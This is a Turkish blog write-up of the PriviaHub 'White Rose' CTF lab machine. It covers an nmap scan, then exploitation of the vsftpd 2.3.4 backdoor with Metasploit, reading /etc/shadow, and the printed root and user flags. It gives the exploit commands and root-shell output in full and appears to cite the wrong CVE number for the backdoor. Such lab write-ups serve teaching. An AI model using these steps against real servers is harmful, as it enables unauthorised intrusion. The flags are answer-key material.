PriviaHub White Rose CTF


PriviaHub White Rose CTF

PriviaHub’ın White Rose adlı makinesinin çözümünü sizlere anlatmak isterim.

İlk olarak vpn ile sanal ağa katılın. Makine’nin sayfasından ihtiyacınız olan IP adresini alın ve makine ile bağlantınızın olup olmadığını kontrol etmek için pingleyin. Bağlantınız varsa hadi başlayalım :D

Bilgi Toplama

Öncelikle nmap ile makineyi tarıyoruz: 
root@kali:~# nmap -sV -p- 172.16.1.58
Sonuçlar;
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-21 10:57 MSK
Stats: 0:02:58 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 42.34% done; ETC: 11:04 (0:04:02 remaining)
Stats: 0:04:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 66.78% done; ETC: 11:04 (0:02:18 remaining)
Stats: 0:05:59 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 84.00% done; ETC: 11:04 (0:01:09 remaining)
Stats: 0:06:52 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 90.77% done; ETC: 11:05 (0:00:42 remaining)
Nmap scan report for 172.16.1.58
Host is up (0.032s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 482.52 seconds
Bu çıktıya göre makinede görünen 3 adet açık port var (80HTTP, 22SSH, 21FTP).

HTTP – Web Sayfasının İncelenmesi

Makinenin 80.portuna bağlandığımızda bizi bir sayfa karşılıyor. Ama herhangi bir işimize yarayacak bir bilgi bulamadığım için portlardan gitmeyi tercih ettim. 

SSH ve FTP İncelenmesi

Burada ise ilk olarak SSH elemek istedim çünkü elimizde herhangi bir kullanıcı adı vs olmadı için FTP yönelmeyi tercih ettim. İlk olarak 21 porta çalışan ftp servisinin versiyon bilgisi ile (vsftpd 2.3.4) googel küçük bir arama ile 2011 yılında çıkan CVE – 2011-0862 adında bir CVE kaydını buldum ve RAPID7 adlı siteden exploit kulanım bilgilerinin alarak saldırı aşamasına geçtim.

Saldırı

Bu aşamada ilk olarak msfconsolu çalıştırarak komut olarak search vsftpd 2.3.4 yazdığım zaman RAPID7 deki bilgiler ile aynı olan modül karşıma çıktı ve modülü use komutu ile seçerek işlemlerime devam ettim.
msf6 > search vsftpd 2.3.4
Matching Modules
================
 # Name Disclosure Date Rank Check Description
 - ---- --------------- ---- ----- -----------
 0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 
Devamında ise seçtiğim modülü Show options komutu ile listeleyerek bilgi girilmesi gereken alanları baktım. Ve set RHOSTS ile sadece hedef ip girerek kaydettim.
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 RHOSTS 172.16.1.58 yes The target host(s), range CIDR identifier, or hosts file 
with syntax 'file:'
 RPORT 21 yes The target port (TCP)
Devamında ise kontrol ettikten sonra run komutu ile çalıştırdım. Ve sistem exploit edildi ve root düzeyinde erişim elde ettik.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 172.16.1.58:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 172.16.1.58:21 - USER: 331 Please specify the password.
[+] 172.16.1.58:21 - Backdoor service has been spawned, handling...
[+] 172.16.1.58:21 - UID: uid=0(root) gid=0(root) groups=0(root)
[*] Found shell.
[*] Command shell session 4 opened (0.0.0.0:0 -> 172.16.1.58:6200) at 2021-05-21 11:48:11 
+0300
id
uid=0(root) gid=0(root) groups=0(root)
Bu aşamadan sonra ilk root bayrağını ve sonrasında etc/shadow inceleyerek adı ollie olan kullanıcıyı tespit ettim ve kullanıcının home dizinine giderek user bayrağına ulaştım ve tüm bayrakları toplayarak sistemden ayrıldım.
(root flag!!!)
privflag.txt
cat privflag.txt
9aeb1a59927458df21ac54e02115fa56
----------------------------------------------------------------------------------------------
(ollie user flag!!!)
ollie
cd ollie
ls
non-privflag.txt
cat non-privflag.txt
9c891a5d82d458df21ab54e02115af78
Makine artık çözüldü, iyiydi. Priviahub teşekkür ederek yazımı sonlandırıyorum.

Yorumlar

Bu blogdaki popüler yayınlar

Maltego Nedir? Nasıl Kullanılır?

Wireshark ile SSH Analizi

Bind Shell ve Reverse Shell Nedir?